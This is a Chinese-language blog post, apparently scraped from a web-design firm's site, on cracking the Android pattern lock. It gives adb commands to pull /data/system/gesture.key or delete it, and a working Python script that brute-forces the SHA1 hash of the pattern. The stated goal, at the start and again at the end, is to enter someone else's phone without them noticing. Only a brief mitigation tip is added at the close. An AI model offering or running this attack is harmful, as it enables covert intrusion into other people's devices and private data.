新聞中心
安卓手機(jī)的圖形鎖(九宮格)是3×3的點陣,按次序連接數(shù)個點從而達(dá)到鎖定/解鎖的功能。最少需要連接4個點,最多能連接9個點。網(wǎng)上也有暴力刪除手機(jī)圖形鎖的方法,即直接干掉圖形鎖功能。但假如你想進(jìn)入別人的手機(jī),但又不想引起其警覺的話……你可以參考一下本文。

成都創(chuàng)新互聯(lián)主營南陵網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營網(wǎng)站建設(shè)方案,成都App制作,南陵h5微信小程序開發(fā)搭建,南陵網(wǎng)站營銷推廣歡迎南陵等地區(qū)企業(yè)咨詢
前提條件:手機(jī)需要root,而且打開調(diào)試模式。一般來講,如果用過諸如“豌豆莢手機(jī)助手”、“360手機(jī)助手”一類的軟件,都會被要求打開調(diào)試模式的。如果要刪除手機(jī)內(nèi)置軟件,則需要將手機(jī)root。
原理分析
首先科普一下,安卓手機(jī)是如何標(biāo)記這9個點的。通過閱讀安卓系統(tǒng)源碼可知,每個點都有其編號,組成了一個3×3的矩陣,形如:
00 01 02
03 04 05
06 07 08
假如設(shè)定解鎖圖形為一個“L”形,如圖:
那么這幾個點的排列順序是這樣的:00 03 06 07 08。系統(tǒng)就記下來了這一串?dāng)?shù)字,然后將這一串?dāng)?shù)字(以十六進(jìn)制的方式)進(jìn)行SHA1加密,存儲在了手機(jī)里的/data/system/gesture.key 文件中。我們用數(shù)據(jù)線連接手機(jī)和電腦,然后ADB連接手機(jī),將文件下載到電腦上(命令:adb pull /data/system/gesture.key gesture.key),如圖:
用WinHex等十六進(jìn)制編輯程序打開gesture.key,會發(fā)現(xiàn)文件內(nèi)是SHA1加密過的字符串:c8c0b24a15dc8bbfd411427973574695230458f0,如圖:
當(dāng)你下次解鎖的時候,系統(tǒng)就對比你畫的圖案,看對應(yīng)的數(shù)字串是不是0003060708對應(yīng)的加密結(jié)果。如果是,就解鎖;不是就繼續(xù)保持鎖定。那么,如果窮舉所有的數(shù)字串排列,會有多少呢?聯(lián)想到高中的階乘,如果用4個點做解鎖圖形的話,就是9x8x7x6=3024種可能性,那5個點就是15120,6個點的話60480,7個點181440,8個點362880,9個點362880??偣彩?85824種可能性(但這么計算并不嚴(yán)密,因為同一條直線上的點只能和他們相鄰的點相連)。
滿打滿算,也不到985824種可能性。乍一看很大,但在計算機(jī)面前,窮舉出來這些東西用不了幾秒鐘。
破解過程
知道了原理,就著手寫程序來實現(xiàn)吧。這里使用了Python來完成任務(wù)。主要應(yīng)用了hashlib模塊(對字符串進(jìn)行SHA1加密)和itertools模塊(Python內(nèi)置,生成00-09的排列組合)。
主要流程為:
1.ADB連接手機(jī),獲取gesture.key文件
2.讀取key文件,存入字符串str_A
3.生成全部可能的數(shù)字串
4.對這些數(shù)字串進(jìn)行加密,得到字符串str_B
5.將字符串str_A與str_B進(jìn)行對比
6.如果字符串A,B相同,則說明數(shù)字串num就是想要的解鎖順序
7.打印出數(shù)字串num
下面為程序:
# -*- coding: cp936 -*-import itertools import hashlib import time import os #調(diào)用cmd,ADB連接到手機(jī),讀取SHA1加密后的字符串
os.system("adb pull /data/system/gesture.key gesture.key")
time.sleep(5)
f=open('gesture.key','r')
pswd=f.readline()
f.close()
pswd_hex=pswd.encode('hex')print '加密后的密碼為:%s'%pswd_hex #生成解鎖序列,得到['00','01','02','03','04','05','06','07','08']
matrix=[] for i in range(0,9):
str_temp = '0'+str(i)
matrix.append(str_temp)#將00——08的字符進(jìn)行排列,至少取4個數(shù)排列,最多全部進(jìn)行排列
min_num=4
max_num=len(matrix)for num in range(min_num,max_num+1):#從04 -> 08
iter1 = itertools.permutations(matrix,num)#從9個數(shù)字中挑出n個進(jìn)行排列
list_m=[]
list_m.append(list(iter1))#將生成的排列全部存放到 list_m 列表中
for el in list_m[0]:#遍歷這n個數(shù)字的全部排列
strlist=''.join(el)#將list轉(zhuǎn)換成str。[00,03,06,07,08]-->0003060708
strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#將字符串進(jìn)行SHA1加密
if pswd_hex==strlist_sha1:#將手機(jī)文件里的字符串與加密字符串進(jìn)行對比
print '解鎖密碼為:',strlist總結(jié)
從程序本身來說,得到解鎖密碼后應(yīng)該用break跳出循環(huán)并終止程序運行。但Python并沒有跳出多重循環(huán)的語句,如果要跳出多重循環(huán),只能設(shè)置標(biāo)志位然后不停進(jìn)行判定。為了運行速度就略去了“跳出循環(huán)”這個步驟。(有沒有更好的實現(xiàn)跳出多重循環(huán)的方法?)另外也略去了很多容錯語句。從破解目的來說,如果單單是忘記了自己的手機(jī)圖形鎖密碼,完全可以用更簡單的辦法:ADB連接手機(jī),然后“adb rm /data/system/gesture.key”刪除掉gesture.key文件,此時圖形鎖就失效了,隨意畫一下就能解鎖。但本文開篇假設(shè)的是“為了不被察覺地進(jìn)入到別人的手機(jī)里”,所以就有了這篇文章。
最后提一個安全小建議:如果手機(jī)已root,還要用“XX手機(jī)助手”,還想設(shè)置圖形鎖的話——在手機(jī)“設(shè)置”選項里,有一個“鎖定狀態(tài)下取消USB調(diào)試模式”(這個名字因手機(jī)而異,而且有的有此選項,有的手機(jī)就沒有),開啟此功能之后,在手機(jī)鎖定狀態(tài)下就能夠防范此類攻擊了。此文技術(shù)原理很簡單,還望各位大大傳授些高大上的Python編程技巧。
當(dāng)前標(biāo)題:如何破解安卓手機(jī)上的圖形鎖(九宮格鎖)
標(biāo)題來源:http://m.5511xx.com/article/coipoio.html


咨詢
建站咨詢
